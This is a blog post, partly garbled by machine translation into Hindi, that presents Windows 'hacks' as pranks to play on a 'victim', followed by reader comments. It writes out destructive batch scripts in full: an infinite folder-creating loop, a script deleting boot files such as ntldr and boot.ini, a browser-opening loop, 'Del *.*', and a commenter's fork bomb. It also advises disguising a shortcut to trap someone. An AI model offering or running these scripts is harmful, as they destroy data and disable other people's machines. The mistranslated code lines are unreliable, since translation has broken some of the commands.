मैं इन हैक्स साझा कर रहा हूँ कि आप उन्हें अपने कंप्यूटर पर की कोशिश कभी नहीं करना चाहिए. आपके कंप्यूटर पर इनमें से किसी एक की कोशिश कर रहा है आप डेटा की हानि और पिछले सेटिंग्स करने के लिए अपने कंप्यूटर को ठीक करने के लिए समय का नेतृत्व कर सकते हैं. अगर किसी को वास्तव में अपने जीवन में परेशान तो आप उन पर इस चाल की कोशिश कर सकते हैं. And again I am warning you not to use these tricks on your computer if you want to be on the safer hand.
1) Crash the computer with a simple link
This is a simple java script called “exploit”. This script can hang or crash your computer. This script just floods you up with the infinite number mailto:xxx windows. To prevent this you need to end the process of script before it runs out of your RAM. This can only be done by rebooting your computer before it fully utilizes your RAM.
WARNING THIS LINK WILL CRASH YOUR BROWSER OR WORSE, YOUR COMPUTER !!!!
Click Here. (http://tiny.cc/ibJUN)
2) Make countless number of folders with a single click
A simple 3 line code can be very dangerous to you and could eat up your full memory space without you even recognising it. So paste the below code in notepad and save it as webretina.bat
@echo off
:top
md %random%
goto top
@echo off > this command makes your screen appears blank but actually making the countless number of folders in the background
Md %random% > md %random% is a command for creating folders with random names. ( md is a command in dos for making directories)
Goto top > goto top is a command for to send the control to :top causing an infinite loop.
To make this trick more effective you would have to make it little suspicious to the victim. For this create a shortcut so that victim could easily come onto your trap like its shown below.
3) Shout down you PC For ever
This is the most deadliest trick which you should not do it on your computer. So you should take your eyes off this trick because once done could not retriever your computer back.
To make this trick work copy the below codes into notepad and save them as Webretina_shutdown.bat
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
DON’T RUN THE BATCH FILE ,YOU WONT RECOVER BACK AFTER YOU RUN IT !!!
4) RAM crashing trick.
Open notepad and type the following codes
:एक
प्रारंभ www.webretina.com
Goto A
save the file as webretina.bat
This code will infinitely loop the browser to open www.webretina.com
5) Delete all system files with just 6 character command
Copy the following command in your notepad and save it as webretina.bat
Del *.*
So when the victim will run this file all the data in his system will vanish in just 5 मेरे.
Please don’t try these tricks on any one because your few minutes of entertainment can be a loss of years of hard work for someone
संबंधित पोस्ट:








you forgot the fork bomb:
edit forkbomb.bat
in the forkbomb.bat add the following line
%0%|%0%
do not run this bomb.
#5 is incorrect. I’ll leave it up to the reader to figure out why.
most of those only overload your ram, a simple reboot, EVEN AFTER your computer has”crashed” will put you back into working order, filling up your RAM is easily fixed by a reboot, the temp and brief interrupt in power causes the RAM to lose its contents. So while most of those might be annoying, and even scary for the uninitiated they are hardly the end all DOOM and end your computers life, sort of hack that they are made out to be…just sayin…keep it real man
Because windows restricts using del command on system files